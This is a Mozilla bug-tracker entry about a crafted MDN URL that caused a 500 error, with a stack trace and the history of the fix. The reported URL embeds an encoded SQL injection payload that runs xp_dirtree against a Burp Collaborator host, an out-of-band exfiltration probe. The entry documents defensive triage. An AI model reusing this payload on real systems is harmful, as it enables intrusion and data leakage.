500 ISE on some values for $samples

RESOLVED FIXED

Status

developer.mozilla.org
Security
RESOLVED FIXED
2 years ago
2 years ago

People

(Reporter: jwhitlock, Assigned: rjohnson)

Tracking

Details

(Whiteboard: [specification][type:bug])

(Reporter)

Description

2 years ago
What did you do?
================
A user intentionally or accidentally crafted a URL:

https://mdn.mozillademos.org/en-US/docs/IndexedDB/Using_IndexedDB$samples/Full_IndexedDB_example%3Bdeclare%20@q%20varchar(99)%3Bset%20@q%3D'%5C%5C0opnfoykgtyvofgudak3gu07nytphg74ywlm9b.burpcollab'+'orator.net%5Cxrt'%3B%20exec%20master.dbo.xp_dirtree%20@q%3B--%20?key-to-delete=555-555-0199@example.com&pub-biblioid-to-delete=555-555-0199@example.com"



What happened?
==============
A 500 error occurs when the URL is visited

What should have happened?
==========================
A 400 Bad Request or other is returned.

Is there anything else we should know?
======================================
Stack trace:

ValueError: All strings must be XML compatible: Unicode or ASCII, no NULL bytes or control characters
  File "django/core/handlers/base.py", line 132, in get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "newrelic/hooks/framework_django.py", line 499, in wrapper
    return wrapped(*args, **kwargs)
  File "django/views/decorators/http.py", line 45, in inner
    return func(request, *args, **kwargs)
  File "kuma/wiki/decorators.py", line 31, in _added_header
    response = func(request, *args, **kwargs)
  File "django/views/decorators/clickjacking.py", line 61, in wrapped_view
    resp = view_func(*args, **kwargs)
  File "kuma/wiki/decorators.py", line 106, in process
    return func(request, *args, **kwargs)
  File "kuma/wiki/views/code.py", line 34, in code_sample
    data = job.get(document.pk, sample_name)
  File "cacheback/base.py", line 112, in get
    result = self.refresh(*args, **kwargs)
  File "cacheback/base.py", line 226, in refresh
    result = self.fetch(*args, **kwargs)
  File "kuma/wiki/jobs.py", line 112, in fetch
    return document.extract.code_sample(sample_name)
  File "newrelic/api/function_trace.py", line 110, in literal_wrapper
    return wrapped(*args, **kwargs)
  File "kuma/wiki/content.py", line 143, in code_sample
    sample = pq(src).find('[id="%s"]' % name)
  File "pyquery/pyquery.py", line 647, in find
    for child in tag.getchildren()]
  File "src/lxml/lxml.etree.pyx", line 1587, in lxml.etree._Element.xpath (src/lxml/lxml.etree.c:61854)
  File "src/lxml/xpath.pxi", line 295, in lxml.etree.XPathElementEvaluator.__call__ (src/lxml/lxml.etree.c:178374)
  File "src/lxml/apihelpers.pxi", line 1439, in lxml.etree._utf8 (src/lxml/lxml.etree.c:32441)
(Assignee)

Updated

2 years ago
Assignee: nobody → rjohnson
(Assignee)

Comment 2

2 years ago
Deployed to staging and production.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → FIXED
(Reporter)

Comment 3

2 years ago
The second URL now returns an empty response, but the original URL still raises a 500 error.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
(Reporter)

Comment 4

2 years ago
Both URLs now return empty responses.
Status: REOPENED → RESOLVED
Last Resolved: 2 years ago2 years ago
Resolution: --- → FIXED
(Reporter)

Comment 5

2 years ago
The test string implies that this security testing suite was used to generate the URL:

https://portswigger.net/burp/help/collaborator.html
(Reporter)

Comment 6

2 years ago
Fix deployed to production, removing security flag.
Group: websites-security
You need to log in before you can comment on or make changes to this bug.